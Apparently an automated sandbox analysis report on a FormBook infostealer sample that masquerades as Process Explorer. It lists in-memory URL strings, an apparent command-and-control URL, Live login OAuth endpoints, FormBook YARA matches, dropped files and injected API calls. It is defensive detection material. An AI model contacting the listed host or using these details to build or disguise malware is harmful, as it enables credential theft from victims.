          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: NETSTAT.EXE, 0000000F.00000002.512545752.00000000038E9000.00000004.00000001.sdmpString found in binary or memory: http://www.thedraftmedic.com
          Source: NETSTAT.EXE, 0000000F.00000002.512545752.00000000038E9000.00000004.00000001.sdmpString found in binary or memory: http://www.thedraftmedic.com/m3px/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: NETSTAT.EXE, 0000000F.00000003.377441143.0000000000454000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
          Source: NETSTAT.EXE, 0000000F.00000003.377441143.0000000000454000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
          Source: NETSTAT.EXE, 0000000F.00000003.377441143.0000000000454000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
          Source: NETSTAT.EXE, 0000000F.00000003.376815987.00000000054E0000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.
          Source: NETSTAT.EXE, 0000000F.00000002.509859661.0000000002D98000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfken&display=windesktop&theme=win7&lc=1033&redirect_uri=htt
          Source: NETSTAT.EXE, 0000000F.00000003.377441143.0000000000454000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10336b
          Source: NETSTAT.EXE, 0000000F.00000003.377441143.0000000000454000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
          Source: NETSTAT.EXE, 0000000F.00000003.377441143.0000000000454000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.506448280.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.509897320.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.351123790.0000000003830000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.354123960.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\NETSTAT.EXEDropped file: C:\Users\user\AppData\Roaming\N64OT294\N64logri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\NETSTAT.EXEDropped file: C:\Users\user\AppData\Roaming\N64OT294\N64logrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.506448280.00000000001E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.506448280.00000000001E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.509897320.0000000002DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.509897320.0000000002DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.351123790.0000000003830000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.351123790.0000000003830000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.354123960.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.354123960.0000000010410000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B9540 NtReadFile,LdrInitializeThunk,4_2_053B9540
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B95D0 NtClose,LdrInitializeThunk,4_2_053B95D0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B9710 NtQueryInformationToken,LdrInitializeThunk,4_2_053B9710
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B97A0 NtUnmapViewOfSection,LdrInitializeThunk,4_2_053B97A0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B9780 NtMapViewOfSection,LdrInitializeThunk,4_2_053B9780
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B9660 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_053B9660
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B96E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_053B96E0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_053B9910
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B99A0 NtCreateSection,LdrInitializeThunk,4_2_053B99A0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B9860 NtQuerySystemInformation,LdrInitializeThunk,4_2_053B9860
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B9840 NtDelayExecution,LdrInitializeThunk,4_2_053B9840
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B98F0 NtReadVirtualMemory,LdrInitializeThunk,4_2_053B98F0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B9A20 NtResumeThread,LdrInitializeThunk,4_2_053B9A20
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B9A00 NtProtectVirtualMemory,LdrInitializeThunk,4_2_053B9A00
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B9A50 NtCreateFile,LdrInitializeThunk,4_2_053B9A50
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053BAD30 NtSetContextThread,4_2_053BAD30
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B9520 NtWaitForSingleObject,4_2_053B9520
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B9560 NtWriteFile,4_2_053B9560
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B95F0 NtQueryInformationFile,4_2_053B95F0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B9730 NtQueryVirtualMemory,4_2_053B9730
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053BA710 NtOpenProcessToken,4_2_053BA710
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053BA770 NtOpenThread,4_2_053BA770
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B9770 NtSetInformationFile,4_2_053B9770
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B9760 NtOpenProcess,4_2_053B9760
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B9FE0 NtCreateMutant,4_2_053B9FE0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B9610 NtEnumerateValueKey,4_2_053B9610
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B9670 NtQueryInformationProcess,4_2_053B9670
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B9650 NtQueryValueKey,4_2_053B9650
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B96D0 NtCreateKey,4_2_053B96D0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B9950 NtQueueApcThread,4_2_053B9950
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B99D0 NtCreateProcessEx,4_2_053B99D0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B9820 NtEnumerateKey,4_2_053B9820
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053BB040 NtSuspendThread,4_2_053BB040
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B98A0 NtWriteVirtualMemory,4_2_053B98A0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B9B00 NtSetValueKey,4_2_053B9B00
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053BA3B0 NtGetContextThread,4_2_053BA3B0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B9A10 NtQuerySection,4_2_053B9A10
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053B9A80 NtOpenDirectoryObject,4_2_053B9A80
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_10429850 NtCreateFile,4_2_10429850
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_10429900 NtReadFile,4_2_10429900
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_10429980 NtClose,4_2_10429980
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_10429A30 NtAllocateVirtualMemory,4_2_10429A30
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_1042984A NtCreateFile,4_2_1042984A
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_104298FD NtReadFile,4_2_104298FD
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_1042997A NtClose,4_2_1042997A
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_10429A2A NtAllocateVirtualMemory,4_2_10429A2A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02DE9A30 NtAllocateVirtualMemory,15_2_02DE9A30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02DE9850 NtCreateFile,15_2_02DE9850
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02DE9980 NtClose,15_2_02DE9980
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02DE9900 NtReadFile,15_2_02DE9900
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02DE9A2A NtAllocateVirtualMemory,15_2_02DE9A2A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02DE98FD NtReadFile,15_2_02DE98FD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02DE984A NtCreateFile,15_2_02DE984A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02DE997A NtClose,15_2_02DE997A
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_05441D554_2_05441D55
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_05370D204_2_05370D20
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_05442D074_2_05442D07
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_054425DD4_2_054425DD
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053A25814_2_053A2581
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_0538D5E04_2_0538D5E0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_0543D4664_2_0543D466
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_0538841F4_2_0538841F
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_0544DFCE4_2_0544DFCE
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_05441FF14_2_05441FF1
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_05396E304_2_05396E30
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_0543D6164_2_0543D616
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_05442EF74_2_05442EF7
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053941204_2_05394120
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_0537F9004_2_0537F900
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_054310024_2_05431002
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_0544E8244_2_0544E824
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053A20A04_2_053A20A0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_0538B0904_2_0538B090
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_054428EC4_2_054428EC
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_054420A84_2_054420A8
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_05442B284_2_05442B28
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_053AEBB04_2_053AEBB0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_0543DBD24_2_0543DBD2
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_054303DA4_2_054303DA
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_054422AE4_2_054422AE
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_1042D0324_2_1042D032
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_104110304_2_10411030
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_1042E1004_2_1042E100
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_10412D8C4_2_10412D8C
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_10412D904_2_10412D90
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_1042CE004_2_1042CE00
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_1042CF4F4_2_1042CF4F
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_10419F7B4_2_10419F7B
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_10419F804_2_10419F80
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_10412FB04_2_10412FB0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4_2_1042C7B34_2_1042C7B3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02DD9F8015_2_02DD9F80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02DD2FB015_2_02DD2FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02DD9F7B15_2_02DD9F7B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02DD2D9015_2_02DD2D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02DD2D8C15_2_02DD2D8C
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 0537B150 appears 45 times
          Source: Dgslimt_Signed_.exeStatic PE information: invalid certificate
          Source: Dgslimt_Signed_.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: Dgslimt_Signed_.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Dgslimt_Signed_.exe, 00000000.00000000.241042671.00000000004B1000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameProcexp.exeB vs Dgslimt_Signed_.exe
          Source: Dgslimt_Signed_.exeBinary or memory string: OriginalFilenameProcexp.exeB vs Dgslimt_Signed_.exe
          Source: 00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.506448280.00000000001E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.506448280.00000000001E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.256839254.00000000045AC000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 00000000.00000003.245136247.0000000004534000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 00000000.00000003.256638693.00000000045AC000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
